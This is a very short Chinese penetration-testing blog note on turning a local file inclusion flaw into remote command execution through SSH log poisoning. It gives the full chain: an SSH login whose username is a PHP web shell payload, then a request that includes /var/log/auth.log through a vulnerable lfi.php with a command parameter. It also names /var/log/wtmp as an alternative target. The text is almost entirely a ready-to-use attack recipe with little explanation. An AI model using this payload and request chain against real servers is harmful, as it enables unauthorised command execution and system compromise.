LFI_SSH日志 发表于 2019-08-27 | 更新于: 2019-09-05 | 分类于 渗透测试 , 知识科普 , 奇淫技巧 | | 阅读次数: ℃ 字数统计: 87 | 阅读时长 ≈ 1 登陆SSH:ssh '<?php system($_GET[‘c’]); ?>'@192.168.1.105包含文件:http://192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ls/var/log/auth.log只有ubuntu系有。 其实对linux,可以包含/var/log/wtmp。一样的效果。有16字符可控,足够了。 只可以没有x权限,要不然ssrf fastcgi就有意思了。 -------------本文结束❤感谢阅读-------------